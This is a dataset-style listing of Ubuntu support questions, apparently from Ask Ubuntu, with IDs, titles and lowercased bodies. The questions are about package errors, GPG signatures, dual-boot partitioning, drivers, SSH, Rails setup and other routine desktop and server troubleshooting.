104201	software center and update manager not working	when i run update manager i always get this message `` the action would require the installation of packages from not authenticated sources . '' details `` libv4l-0 libv4lconvert0 '' i also can not get the software center to install anything . i get an error message telling me to check my internet connection but i am connected to the internet , shortly after i get an error message just like the one i get from update manager . how do i fix this ?
104211	payment error message : `` sorry , there was a problem ''	i attempted to purchase an extra 20gb of storage space ; when i selected to pay i was given the following error message : sorry , there was a problem with no context to what the problem is . what can i do about this ?
104213	gpg invalid signature	i am having problems with the following ( in an attempt to remove hyperlinks , i have removed one of the `` / '' from the addresses ) : w : gpg error : http : //archive.ubuntu.com oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures were invalid : badsig b725097b3acc3965 launchpad lffl w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures were invalid : badsig 4874d3686e80c6b7 launchpad ppa for banshee team w : gpg error : http : //archive.getdeb.net jaunty-getdeb release : the following signatures were invalid : badsig a8a515f046d7e7cf getdeb archive automatic signing key < archive @ getdeb.net > w : gpg error : http : //badgerports.org lucid release : the following signatures were invalid : badsig c90f9cb90e1fad0c jo shields < directhex @ apebox.org > w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures were invalid : badsig 976b5901365c5ca1 launchpad ppa for transmissionbt w : failed to fetch http : //ppa.launchpad.net/dlecan/openjdk/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/dlecan/openjdk/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/sevenmachines/flash/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/sun-java-community-team/sun-java6/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/sun-java-community-team/sun-java6/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found i have tried the following solutions which were in a closed case titled `` the following signatures were invalid '' : first of all try sudo apt-get clean sudo apt-get update & & sudo apt-get upgrade some isps cache the packages and errors like these are reported then . if the above commands do n't work , try sudo apt-get update -o acquire : :http : :no-cache=true and again sudo apt-get update & & sudo apt-get upgrade if it still does n't work , sudo apt-get update -o acquire : :brokenproxy=true sudo apt-get update & & sudo apt-get upgrade
104217	why is there a squid user account ?	i just noticed that there is a user account in my ubuntu installation and i can not recall creating it myself . i understand that squid is a proxy manager but i do n't know why should there be a user account for it !
104218	how to get cinnamon working in virtualbox ?	i installed ubuntu 11.10 ( 32-bit ) in virtualbox 4.1.8 . i wanted to install cinnamon , so i did and i have the option to choose it from the login screen , as well as gnome options . if i choose ubuntu i get unity , which works fine . gnome also works . but when i choose cinnamon , the screen goes black and nothing responds and i have to reset the virtual machine . i have already installed ubuntu 11.10 ( 64-bit ) onto the pc in a separate partition ( currently running 10.10 but trying out 11.10 ) and in that cinnamon works perfectly . in virtualbox i have 3d settings enabled and gave the virtual machine 128 mb graphics ram , and 1024 mb system ram . what settings should i change or what should i do to get cinnamon working in ubuntu in virtualbox ? i have also tried doing it in linuxmint 12 , but i get the same problem , just a black screen when selecting cinnamon . so are cinnamon and virtualbox incompatible ?
104225	how do i force install a .run ?	trying to install my ati driver , and it 's not letting me , how would i force a .run to install ?
104228	invalid access to fat ( entry 0x0606bfdf )	i am trying to install ubuntu 11.10 over a corrupted partition of windows 7 . booting from usb i select install on hdd and everything is fine and dandy until i get this error half way though initial load right after splash screen . [ 10.733813 ] fat-fs ( sdb ) : error , invalid access to fat ( entry 0x0606bfdf ) i have formatted my usb as a fat 32 device before booting from it . also have tried to install with in windows . keeping windows intact but get another error message about missing files . and also tried to install from cd nothing is working . what would be the next step ( easiest ) should i just completely erase hdd before placing ubuntu on ?
104231	fix partition tables - dual boot ubuntu and leopard	even though i have been able to install and run ubuntu 11.10 in dual boot in a macbook pro 5.1 , it seems there is still something to fix : refit gives me two icons to log into ubuntu . right now when i start the computer i have to choose between : apple from hd , linux from hd and linux from partition 3. refit partition tool says there is no need to sync the tables since `` no gtp partition was found '' , although it also says it could n't found gtpsync . according to this tool , there are three partitions on the disk : one for mac , one for linuxswamp and one for ubuntu . using the diskutility in mac results differ , showing 4 partitions : 200mb as `` boot volume '' , 173gb as the mac partition , 1023mb named `` disk0s2 '' ( this is the linux swamp ) and 59gb named `` disk0s3 '' which is the ubuntu partition . using the diskutility in ubuntu shows 3 partitions ( it does n't show the 200mb one ) . gparted shows the same 4 partitions that mac does , and i remember when installing ubuntu the installation tool showed some other small `` free spaces '' between partitions . to fix the tables , i have tried to install gdisk in mac and follow the instructions from that forum post , but after i wrote sudo gdisk /dev/disk0 in terminal ( and after writting my password ) i get dyld : unknown required load command 0x80000022 trace/bpt trap . it might be that gdisk does n't work in leopard ? i have also tried to fix the tables this way . and i have tried to get ride of that extra linux icon on refit by following by using sudo fdisk -u /dev/disk0 in macos terminal , but then the only linux icon i get -which is the partition3 one- wo n't boot ( so i have to follow the last way to fix tables to get grub reinstalled to /sda ) . so ... .. any ideas what to do ? ? right now it 's not a big deal , since i can work with everything .
104233	access exchange 2003 mailbox from terminal	how do i check an exchange mailbox for new mail from the command line ? i 'm at a complete loss here .
104234	random crashes when using smart interactive whiteboards	i am in charge of the computer systems in our school and have set up a number of ubuntu 11.10 machines in the classrooms and have a working ubuntu live-usb system in place for the students ( students have 16 gb sticks , with a full install of 11.10 ) . over the last months , i got the machines to work quite well , especially the live-usb works like a charm , however we have interactive smart whiteboards in our classrooms and i downloaded and installed the smart software to the computers which are used in the classrooms . the problem is that ubuntu randomly crahses when using ( i.e . touching ) the smartboard . it happens almost only while writing or clicking on the board , but sometimes ( much rarer ) also in pauses between writing . when using other input methods ( typing , mouse ) there are alomst no problems ( sometimes , when you really push the system , you might just manage to crash it ) . also , the live usb , which is running on machines with the exact same setup save the harddisk and the cd drive ( same mainboard , cpu , ram , peripherals etc . ) works really well , there are , however , also isolated , but much rarer , crashes ( 1 random logoff per week or so ) . by `` crash '' i mean either x crahses , logging you off and returning you to the login screen , kernel panics which produce some output on the screen , or the system just going blank . which one , seems to depend on the gdm and the interface ( gnome , unity , xfceâś ) which is used , with unity just logging off , the others panicking . i 've done a lot of googling , experimenting , installing and uninstalling stuff , and i 'm afraid i 'm out of ideas and suggestions . could it also be a hardware issue ? i 'm using a gigabyte ga-h61m-usb3-b3 , h61 mainboard , but could n't find any know issues with it . i would be very grateful for any suggestions . thanks , markus ps : today i also tried a fresh install of 10.04 lts , as smart explicitely states this version as `` compatible '' on their website , it actually only made matters worse ( much more frequent crashes )
104235	how can i remove wine 1.4rc3 and install wine 1.3.37 from ubuntu ppa ?	i 'm running lucid . i had installed wine 1.3.37 from ubuntu wine ppa and i had my programs working . i wanted to install wine 1.4rc3 so that i could install office 2010 . so i compiled 1.4rc3 from source . then i ran into regressions that stopped some programs from working . no matter what i do , i can not seem to get wine 1.3.37 to reinstall . i have completely removed wine , i have used synaptic to `` completely remove '' packages , and i have tried to reinstall the current version from ubuntu wine ppa which should be wine 1.3.37 . when i go to `` about '' under winecfg , it always shows wine 1.4rc3 , and some of my programs do n't work . thanks for the help . lucid lynx backported kernel from oneiric ( 3.0.0.-15 ) with intel glasen drivers for sandy bridge
104236	how to change the recorded date of a video ?	i have 4 videos on my laptop which i took last year in april . but in shotwell it shows me that it was taken in 23.04.1945 . how to change this recorded date of the video ?
104237	installing ruby 1.9.2 for octopress	so , i am trying to install octopress . i need ruby 1.9.2 . it looks like sudo apt-get install ruby wants to install ruby 1.8 . i 've read that rvm is a good way to go . but it seems rather excessive since i do n't expect to use much else apart from the bare-bones needed for octopress . do i have an alternative ? i use a texlive 2011 i installed myself , but i like being up to date there . for ruby , i literally only want it for octopress , so i do n't really want to have to deal with maintenance separately if i can avoid it . i 'd prefer if sudo apt-get update would deal with it for me . i know there are ppas . but the thing is , there are loads of ppas . how do i choose a trustworthy one ?
104239	installed ubuntu to run along side of windows 7 , no option to boot windows	i have windows 7 but i was n't satisfied , so i decided to try linux ubuntu . i think i choose to run along side of windows but since the install it will never give me the option to run windows 7 . is there a code to put in terminal or can i check somehow to see if windows os is still on my computer ? please help me to where i can access windows .
104246	how do i export a .mov with openshot ?	i recorded my desktop with quicktime ( for a tutorial i am making ) on an imac and the output was a .mov file . i edited and deleted scenes with openshot and know i do n't now how to export it to a .mov file again . i know the video format is supposed to be .mov but the codec i am not so sure about that h263 , h262 , libvpx ?
104255	unity lenses are all empty	my dash is completely empty . the alt-f2 run screen load applications if i type in the commands . but the others are completely empty on my own profile . in a guest profile , they work as expected . i 've read the other similar questions and tried both of these options . neither had any effect : apt-get install -- reinstall unity-lens-applications unity-lens-files unity-lens-music unity -- reset i 've upgraded from 10.14 to 12.04 and the lens / dash has never worked . what could be left over in my home directory from a previous version that would mean these lenses are empty ?
104261	remove lubuntu partition and keep ubuntu partition	last night i installed lubuntu 11.10 on my desktop pc . before that i only had ubuntu 11.10 , but now i have a `` dual-boot '' pc , with grub . now , i want to uninstall lubuntu because it does n't like to me . i tried to do that on lubuntu 's live-cd gparted , but it has partitions that i do n't know . and i do n't want to play with that , i do n't want to lose my ubuntu data , these are my partitions : the 38 gb partition is ubuntu . what i need to do is delete lubuntu and enter to ubuntu directly on the boot . also , remember the swap 's partition !
104263	`` isolinux.bin is missing or corrupt '' , when attempting to boot using disk in usb cd drive	i have an external cd drive which connects to usb . i burned 11.10 ubuntu image to cd-r . the disk correctly shows me install page when i autoload disk within windows 7 . when i restart to attempt to boot from disk to install ubuntu i get the following error for a split second before i continues to boot to windows . `` isolinux.bin is missing or corrupt '' . clearly my computer knows that this is a linux disk in the usb cd-drive ... what went wrong ? edit : i reburned another disk , same error
104264	mobile broadband sharing over adhoc wireless	i have a huwaei modem ( e1820 to be precise ) that i use for my internet whims and fancies . but what i want to do is set up an adhoc wireless network so another device can connect to my network and in turn i want that device to be able connect to the internet through the network . i 've managed to set it up relatively effortlessly on win7 so the it is possible on my hardware . but now i need to do it here . basically what i 've done is the following . connect to a `` automatic ( ppp ) '' mobile broadband set up a wireless network set the ssid to a unique name set the mode to `` ad-hoc '' set the ipv4 method to `` manual '' set the ip address ( 196.168.137.100 ) , netmask , gateway ( 196.168.137.1 ) to the same as what i would on win7 tried leaving the dns server blank , tried filling it with the same dns server the mobile card uses and tried setting it to 8.8.8.8 tested ... did n't work ... read some tutorials installed firestarter set the internet connected network device to ppp0 local network connected device to wlan0 enable internet connection sharing at this point i cant even connect to the internet on this computer unless i disable the wlan what am i doing wrong ?
104266	how to view network shares in a consitant way ?	how do i make ubuntu show network shares the same in every application ? i can not access network shares from certain applications at all . if it is n't possible to make a consistent interface , is there at least a way of accessing network shares from applications that do not display them in the expected place ? nautilus shows my network shares as expected gedit shows network shares in a different place virtualbox does not show network shares at all
104268	simulate an already installed operating system	first i have to add that i do not know how to explain what i want in the title so if anybody has a better idea be my guess . here it goes : i have windows 7 installed in one of my hard drives . the whole drive is for windows . as i installed windows 7 on it , it partitioned the drive into 2 parts . one is called the `` system reserved '' and the other is where program files and the rest of the directories are . i wish to run this windows 7 already installed , in some kind of virtual environment ( like virtualbox , xen or similar ) from ubuntu . is there a virtual environment that i can tell it to run this windows 7 from within ubuntu . i may be going out of the box out here but is this possible with any tool that ubuntu comes with .
104273	how do i disable pop-up notifications in xubuntu ?	how can i disable all pop-up notification on xubuntu 11.10 i have tried : sudo apt-get remove notify-osd which resulted in reading package lists ... done building dependency tree reading state information ... done package notify-osd is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
104284	is it possible to color-code the output of apt ?	with the plethora of possibilities for most command-line tools , i would be surprised to learn that there is no way to colorize the info that apt-get , apt-cache , and related tools return . even so , googling was fruitless in this . primarily , it would be nice to have the summary lines that show total count/size , and color-code each type of action count : eg , upgrades in blue , installs in green , held in yellow , and removed in red .
104285	disable multitouch driver and return to default touchpad	i have ubuntu 11.10 installed in dual boot in a macbook pro 5.1 . i have installed the xserver-xorg-input-multitouch multitouch x input driver , but i 'm not sure i like it ( it 's too sensitive and moves too fast ) . so i want to get back to the default touchpad settings , but i ca n't . if i remove the multitouch x driver via synaptics , the touchpad wo n't work anymore . i have tried installing gsynaptics+gpointing device settings , and also i tried installing synaptics touchpad driver for x.org server but nothing works other than the multitouch x ( which is the one installed now , all the others are not ) . also , i do n't have the `` touchpad '' tab under the `` mouse and touchpad '' settings anymore , it disappeared . so , how can i bring back the default touchpad and the touchpad tab ? thanks !
104286	navigating windows folder on ubuntu partition	i have a dual boot win7/ubuntu lts . i can `` see '' all my win7 files on a mounted directory `` os '' via the filemanager . i want to navigate this directory through the command line . i tried but i 'm clueless how to `` cd '' into this mounted partition , any help would be appreciated .
104287	how is ubuntu more updated than debian ?	i am reading debian vs. ubuntu vs. linux mint : which distribution should you use ? ubuntu , on the other hand , is made to include a good combination of new and stable ... some packages can be used on both distributions , while others are specifically for one or the other if ubuntu is based on debian , how is it more updated ? does it simply use different apt soures ? again since it 's based on debian , why are there differences in package compatibility ? does it simply have some different things installed ? can i say : all debian packages will work on ubuntu . all ubuntu packages will work on linux mint ( based on ubuntu ) .
104296	magnet links on lubuntu 12.04 , how do i get them to work ?	i 'm trying to open a magnet link in chromium on lubuntu precise . exactly how would i get this to work ? i 'm running chromium thats the standard on lubuntu . i 'm pretty sure it used to work in 11.10. i 've found a little info here : http : //www.void.gr/kargig/blog/2012/01/24/open-magnet-urls-with-xdg-open/ not sure if that 's correct or not
104297	showing music from windows partition in music folder	i have my music stored on my windows partition , and i can access them from ubuntu . is there anyway to represent them virtually in my music folder in home . what i want to do is similar to how the windows 7 library folders work . thanks in advance .
104304	custom-whitelisted indicators in wrong position on dual monitor	i just upgraded to 11.10 , unity . i use wicd and guake so i went to dconf-editor and whitelisted these guys ( well , i changed the whitelist to 'all ' ) so their icons appear on my top panel . however , when i switch to dual-monitor ( using nvidia 's twinview ) , these indicators ( just the whitelisted ones - not the dropbox/google reader/system load/sound/workspace ones that you can install using the repositories ) move to the middle of the screen and obscure the window name in the top panel ( images below ) . full top panel : see how the guake/wicd icons are to the left over the window title , and all the others are over to the right where they should be ( the second monitor is to the left of this screen ) . closeup : these two ( three , looks like empathy has joined the club ) icons do n't appear at all on the top panel on the other monitor , although the other ones that are behaving normally do . does anyone know how to fix this ( move them back over to the right ) /what further commands i can run to narrow down what the problem is ?
104310	is it possible to lock the volume slider ?	i was wondering if there was anyway that i could lock the volume control for a user because i have a computer hooked up to a sound system but if the computer does any amplification at all i.e . above 50 % volume then it sounds distorted on the speakers . so i would like to lock in the computer volume at 50 % for one if not all users at 50 % and just use the control board its plugged into to control the volume . and help would be awesome thanks .
104311	conect my tablet to a tv with hdmi	i have a tablet with ubuntu 11.10 and i want to connect it to my tv . my tablet has a minihdmi port , i have connected to my tv with a minihdmi-hdmi cable , and what now ? i feel a little silly but i do n't know what to do . can somebody help me ? thanks . hola . tengo una tableta con ubuntu 11.10 y quiero conectarla a mi tv . mi tableta tiene un puerto minihdmi , la he conectado a mi tv con un cable minihdmi-hdmi . me siento un poco tonto , pero no sé qué tengo que hacer ahora . ¿alguien puede orientarme ? gracias .
104316	problem with executing boost library	i am novice to ubuntu and boost . i have installed ubuntu 11.10 and followed the instructions from the website ( http : //www.alittlemadness.com/2009/03/31/c-unit-testing-with-boosttest/ ) to try boost unit test . i install the boost library , and copy the code as in part 3 and try to execute it but i have errors while executing . 8w6wa.o : in function `init_unit_test ( ) ' : btest.cpp : ( .text+0x51 ) : undefined reference to `boost : :unit_test : :framework : :master_test_suite ( ) ' /tmp/ccz8w6wa.o : in function `main ' : btest.cpp : ( .text+0x9f ) : undefined reference to `boost : :unit_test : :unit_test_main ( bool ( * ) ( ) , int , char** ) ' /tmp/ccz8w6wa.o : in function `universeinorder : :test_method ( ) ' : btest.cpp : ( .text+0x121 ) : undefined reference to `boost : :unit_test : :unit_test_log_t : :set_checkpoint ( boost : :unit_test : :basic_cstring < char const > , unsigned int , boost : :unit_test : :basic_cstring < char const > ) ' btest.cpp : ( .text+0x1e3 ) : undefined reference to `boost : :test_tools : :tt_detail : :check_impl ( boost : :test_tools : :predicate_result const & , boost : :unit_test : :lazy_ostream const & , boost : :unit_test : :basic_cstring < char const > , unsigned int , boost : :test_tools : :tt_detail : :tool_level , boost : :test_tools : :tt_detail : :check_type , unsigned int , ... ) ' /tmp/ccz8w6wa.o : in function `__static_initialization_and_destruction_0 ( int , int ) ' : btest.cpp : ( .text+0x2ea ) : undefined reference to `boost : :unit_test : :ut_detail : :auto_test_unit_registrar : :auto_test_unit_registrar ( boost : :unit_test : :test_case* , unsigned long ) ' /tmp/ccz8w6wa.o : in function `boost : :unit_test : :unit_test_log_t : :unit_test_log_t ( ) ' : btest.cpp : ( .text._zn5boost9unit_test15unit_test_log_tc2ev [ _zn5boost9unit_test15unit_test_log_tc5ev ] +0x21 ) : undefined reference to `vtable for boost : :unit_test : :unit_test_log_t' /tmp/ccz8w6wa.o : in function `boost : :unit_test : :make_test_case ( boost : :unit_test : :callback0 < boost : :unit_test : :ut_detail : :unused > c onst & , boost : :unit_test : :basic_cstring < char const > ) ' : btest.cpp : ( .text._zn5boost9unit_test14make_test_caseerkns0_9callback0ins0_9ut_detail6unusedeeens0_13basic_cstringikcee [ boost : :unit_test : :make_test_case ( boost : :unit_test : :callback0 < boost : :unit_test : :ut_detail : :unused > const & , boost : :unit_test : :basic_cstring < char const > ) ] +0x1d ) : undefined reference to `boost : :unit_test : :ut_detail : :normalize_test_case_name ( boost : :unit_test : :basic_cstring < char const > ) ' btest.cpp : ( .text._zn5boost9unit_test14make_test_caseerkns0_9callback0ins0_9ut_detail6unusedeeens0_13basic_cstringikcee [ boost : :unit_test : :make_test_case ( boost : :unit_test : :callback0 < boost : :unit_test : :ut_detail : :unused > const & , boost : :unit_test : :basic_cstring < char const > ) ] +0x5d ) : undefined reference to `boost : :unit_test : :test_case : :test_case ( boost : :unit_test : :basic_cstring < char const > , boost : :unit_test : :callback0 < boost : :unit_test : :ut_detail : :unused > const & ) ' /tmp/ccz8w6wa.o : in function `boost : :unit_test : :unit_test_log_t : :~unit_test_log_t ( ) ' : btest.cpp : ( .text._zn5boost9unit_test15unit_test_log_td2ev [ _zn5boost9unit_test15unit_test_log_td5ev ] +0xb ) : undefined reference to `vtable for boost : :unit_test : :unit_test_log_t' collect2 : ld returned 1 exit status i also try to install sudo apt-get install libboost-dev-all still same error . please help me how to solve this problem . thanks in advance .
104321	manually editing patches and debdiffs	i have a few debdiffs that were created , however , i 'd like to apply a small change to all of them . the process of creating the debdiffs from scratch would be easy but very time-consuming . is manually editing debdiffs ( just open via a text editor ) a good practice or does it render debdiffs unusable ? is there a standard good-practice suggestion for this ?
104323	set up proxy server on ubuntu	few years ago i have configured proxy server on freebsd by it guys . it 's functions register computers by mac address . filter web sites , messengers , downloads set few computers without internet access set some computers with limited internet access . set some computers with full internet access /using exception by ip/ . save and review internet usage of people . i have manual how to add computer by mac , add ban list website and restrict or exception a computer . but now it 's not working and i ca n't find it guys to fix it so i want to try it myself on ubuntu . please again please tell me how to configure proxy server on ubuntu step by step ? it 's very important for me . please help me . or if you have already documented manual please share with me . thank you for your help
104326	ufw give errors and wo n't auto start at boot	i just tried to enable ufw on my server , it gave me this error : error : problem running ufw-init when i tried the second time , it worked . when i tried to set the default rule `` sudo ufw default deny '' i get the same error and it never works . also , when i reboot the system , the firewall is inactive ! earlier when i hired a person to setup my server , i can remeber him saying that mediatemple servers have a problem with ufw ! how can i fix this ?
104329	`` could not connect to session bus '' on login	just got a new ubuntu 11.10 install working . updated my software and rebooted , but now when i try to log in , i 'm greeted with the following error : could not connect to session bus : //bin/dbus-launch terminated abnormally without any error message any ideas ? thanks .
104330	when is the best time to update the current development version of ubuntu ?	i 'm testing ubuntu development version and i want to know when to update the packages . the last time i update the packages regularly , the system broke and i had to reinstall the os .
104334	ssh client takes a long time to respond	i have 2 servers , a & b , both running centos 5.7 . if i ssh using putty from windows 7 to server a or b , the password prompt is quick but if i ssh from ubuntu 11.10 to server a , the password prompt takes a long time , almost 2 minutes ; while server b password prompt is quick , though not as quick as using putty . htw @ htw-hp-probook-4421s : ~ $ time ssh use @ a.biz user @ a.biz 's password : connection closed by a.biz real 2m33.170s htw @ htw-hp-probook-4421s : ~ $ time ssh user @ b.biz user @ b.biz 's password : real 0m1.904s there should n't be anything wrong with both servers since ssh-ing from win 7 is quick . the puzzling bit is logging onto server b is faster than onto server a using ubuntu . both servers sshd.conf are already set to usedns=no how do i debug this ?
104335	ssh'ing into my ubuntu machine from another computer on the same wi-fi access point	i would like to copy some large files ( photos & video from a vacation ) from a mac to an ubuntu machine , over the home wi-fi router that they 're both connected to . i 've got sshd set up on the receiver , so i 'd like to simply rsync over the files from the sender . two questions : should it be as simple as typing the following in the mac 's terminal ? rsync -avz ./vacation_pics 127.0.0.x : ~me/ if so , how do i find out the local ip ( the `` x '' above ) of my ubuntu machine ?
104338	problems with rvm and rails when creating new app	when trying doing rails new myapp , under this path : /home/novito/projectes i get the following error : ca n't initialize a new rails application within the directory of another , please change to a non-rails directory first . type 'rails ' for help . i imagined maybe i created or copied a rails app in my home folder , so i go there and this is the listing i have when doing ls -la drwxr-xr-x 2 novito novito 4096 2012-01-07 18:33 audiobooks -rw-r -- r -- 1 novito novito 604710 2011-06-17 15:54 brasero-session.log drwxr-xr-x 7 root root 4096 2011-11-26 23:52 build drwxr-xr-x 5 novito novito 4096 2011-07-26 19:35 bumblebee d rwxr-xr-x 6 novito novito 4096 2012-02-15 06:23 config -rw-r -- r -- 1 novito novito 157 2012-01-30 21:17 config.ru drwxr-xr-x 19 novito novito 4096 2012-02-15 00:32 desktop -rwxr-xr-x 1 novito novito 409 2011-09-18 11:29 django.fcgi drwxr-xr-x 9 novito novito 4096 2012-02-09 18:35 documents drwxr-xr-x 2 novito novito 16384 2012-02-14 03:11 downloads drwx -- -- -- 10 novito novito 4096 2012-02-13 20:12 dropbox -rw-r -- r -- 1 novito novito 179 2011-06-15 13:39 examples.desktop drwxr-xr-x 2 novito novito 4096 2012-01-30 21:41 gmate drwxr-xr-x 4 novito novito 4096 2011-06-30 11:09 music drwxr-xr-x 17 novito novito 4096 2011-08-21 10:27 măşsica drwxr-xr-x 10 novito novito 4096 2011-11-01 10:30 netbeans-7.0.1 drwxr-xr-x 3 novito novito 4096 2011-11-01 10:32 netbeansprojects drwxr-xr-x 6 novito novito 4096 2011-11-20 16:18 opt drwxr-xr-x 5 novito novito 4096 2012-01-16 01:57 pictures drwxr-xr-x 27 novito novito 4096 2012-02-15 06:07 projectes drwxr-xr-x 2 novito novito 4096 2011-06-15 11:59 public -rw-r -- r -- 1 novito novito 9208 2012-01-30 21:17 readme drwxr-xr-x 2 novito novito 4096 2011-12-25 09:49 schemes drwxr-xr-x 2 novito novito 4096 2012-01-30 21:17 script drwxr-xr-x 3 novito novito 4096 2011-06-16 23:24 software drwxr-xr-x 2 novito novito 4096 2011-06-15 11:59 templates drwxr-xr-x 8 novito novito 4096 2012-01-30 21:17 test drwxr-xr-x 2 novito novito 4096 2012-02-10 20:24 testrails drwxr-xr-x 6 novito novito 4096 2012-01-31 00:41 tmp drwxrwxr-x 2 novito novito 4096 2011-06-15 11:56 ubuntu one drwxr-xr-x 4 novito novito 4096 2012-01-30 21:17 vendor drwxr-xr-x 4 novito novito 4096 2012-01-14 16:02 videos drwxr-xr-x 2 novito novito 4096 2012-01-07 18:33 vă­deos drwxr-xr-x 6 novito novito 4096 2011-11-10 22:55 workspace so , i tried deleting config and vendor since they are other rails app related folder ... but when i delete config , if i try to do rails new , i get this error : < internal : lib/rubygems/custom_require > :29 : in `require ' : no such file to load -- /home/novito/config/boot ( loaderror ) from < internal : lib/rubygems/custom_require > :29 : in `require' from script/rails:5 : in ` < main > ' i do n't really know what 's going on in here , if anyone could give any tips i would be really appreciated .
104341	how do i turn off the onscreen keyboard on the lock screen ?	the lock screen has an on screen keyboard that i am unable to disable . i do n't remember exactly but i believe i turned it on using the `` screen keyboard '' setting in the universal access settings . i 've tried a number of things all with no effect : toggling `` screen keyboard '' in universal access toggling `` onscreen keyboard '' in the login screen ( lightdm ) clicking on the `` x '' in the upper right corner of the keyboard
104343	how do i remove ubuntu from windows ?	i installed the ubuntu for windows version on my vista and it crashed after updating . i tried first to delete it like any other regular app ( because that with ubuntu claims you could ) , but that did n't work . next , i tried to repair my mbr , but that did n't work . it still shows ubuntu as a second choice os for booting up . what can i do ? this is not a regular dual boot system .
104345	can not connect to internet after update	i did a regular update of ubuntu 11.10 yesterday night and it did n't require a restart . after the update finished i still had connection ( wired ) . but , today , when i tried to go to google and other sites , there was no connection . network manager is installed and it said no connection found . i 've checked the cable and nothing seems to be wrong . how can i get my connection back ? it works fine on windows ( from which i 'm writing this ) .
104348	how to fix this gdbus error ?	after running a system update i got this error when i wanted to save a screen shot to my desktop : impossible to save the screenshot to file : ///home/tinuz/pictures . error was gdbus.error : org.freedesktop.dbus.error.spawn.childsignaled : process /usr/bin/nautilus received signal 6 . please choose another location and retry . it tells me to save it to another location but when saving to another location i get the same error message . please let me know how to fix the problem . thanks in advance tinuz just got home and here is the output : tinuz @ pc1-1110 : ~ $ id ; ls -ld /home/tinuz/pictures ; ls -ld /home/tinuz ; ls -ld /home uid=1000 ( tinuz ) gid=1000 ( tinuz ) groups=1000 ( tinuz ) ,4 ( adm ) ,20 ( dialout ) ,24 ( cdrom ) ,46 ( plugdev ) ,116 ( lpadmin ) ,118 ( admin ) ,124 ( sambashare ) drwxr-xr-x 4 tinuz tinuz 4096 2012-02-14 21:25 /home/tinuz/pictures drwxr-xr-x 49 tinuz tinuz 4096 2012-02-15 18:24 /home/tinuz drwxr-xr-x 3 root root 4096 2012-01-29 22:07 /home tinuz @ pc1-1110 : ~ $
104355	ubuntu 11.10 : my ubuntu is getting hanged during startup and during working with it	i installed ubuntu 11.10 almost 2 days back and now i am facing problem at startup and working with any program like video player , eclipse etc .
104359	ubuntu 11.10 mobile broadband connected but no internet access	i am able to establish a mobile broadband connection but i still do n't have access to internet . the mobile broadband works without any issues from windows 7 on the same machine . i configured the mobile broadband connection in the unity network manager . i chose the only available device , `` dell dw5550 '' , provided my country and isp and specified `` mms '' as the plan . when i choose the mobile broadband connection it says `` connection established '' and appears to have an ip address : $ ifconfig usb0 link encap : ethernet hwaddr 02:80:37 : ec:02:00 inet addr:172.29.128.133 bcast:172.29.128.255 mask:255.255.255.128 but i can not resolve any internet host names : $ nslookup google.com ; ; connection timed out ; no servers could be reached how can i diagnose and/or solve this issue ?
104360	how can i set lotus notes as the default mail program ?	what should i write in the : x-scheme-handler/mailto= ? i have lotus notes 8.5.2 . it doesnt work if i just trying to change it from system settings== > default applications . it doesnt give the option to add notes as a default but the calendat is ok and been set automaticly since i installed notes . maybe i just need to know the right name of the application ant put it in : x-scheme-handler/mailto= please help .
104363	how to use the advanced partitioning menu ?	i would like to install ubuntu making my own partitions ... how do i do that ? ( please note i am not an advanced computer user )
104364	update alternative for ubuntu	i am going to re-install ubuntu , is there any alternative way to to re-install ubuntu & full update or do i have to update almost 500 to 600 mb online ? right now my ubuntu 11.10 fully updated , is there any alternative cauzz i dint want to download 5 to 6 hundred mb online
104365	how can i use vbetool as a non-root ( mmap /dev/zero : operation not permitted failed to initialise lrmi ( linux real-mode interface ) . )	i would like to be able to turn off my screen upon a keypress . i need vbetool to do that ( xset dpms force off just blanks it , does not turn it off ) . however , vbetool needs root priviledges . so i put line my_user_name all=nopasswd : /usr/sbin/vbetool '' into my sudoers file with visudo . however , when i run vbetool dpms off , it says mmap /dev/zero : operation not permitted failed to initialise lrmi ( linux real-mode interface ) . any ideas how to solve this ?
104368	docky - how can i change jdownloader icon ?	with docky i have really good icons except of the jdownloader one . installed it from the official repo . how can i change the icon , docky uses ? *open the attached image , then you 'll see what i mean
104372	can not install lazarus ide on ubuntu 10.04	i have downloaded *.deb files from lazarus homepage and used sudo dpkg -i *.deb in lazarus folder . it did install , but could n't run due to error saying : no lazarus executable in usr/lib/lazarus/0.9.30.2/lazarus so i removed it , and tried to install lazarus from software manager and with sudo apt-get install lazarus both with no success . i get following error ( translating to english ) : lazarus : requires : lazarus-ide ( > =0.9.28.2-8ubuntu1 ) e : packages are damaged what should i do ? thanks in advance , regards
104373	how do i install packages to an 8.10 system ?	i am trying to copy some files from a disused ubuntu 8.10 system . to do that i need to install nfs , portmap , etc. , since those are not already installed . so i open synaptic to install the packages . it figures the dependencies and lists the needed packages . i click 'apply ' and get a warning that the sources can not be authenticated . i click 'apply ' anyway and get an error message like : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/main/pool/p/portmap/portmap_6.0-6ubuntu1_i386.deb 404 not found [ ip : 91.189.92.167 80 ] where is there a repository for the most recent 8.10 packages ? thanks for your detailed answer . i used vi instead of sed , and just replaced each occurrence of 'us.archive ' with 'old-releases ' using : : g/us.archive/s//old-releases/g i believe that that is equivalent although my sed skills are a little rusty . first i simply replaced the 'archives ' without getting rid of 'us . ' and got the same 404 errors as before , so that part is important . it seems to be working so far ! i did get some errors like : failed to fetch http : //security.ubuntu.com/ubuntu/dists/intrepid-security/main/binary-i386/packages.gz 404 not found [ ip : 91.189.92.166 80 ] when i clicked 'reload ' in synaptic . should i do something about that ?
104376	exchange email archiving in evolution 3	i have successfully setup evolution 3.2 to retrieve ms exchange 2007 emails using exchange mapi plugin . i was wondering if it is possible to archive ms exchange emails using evolution ?
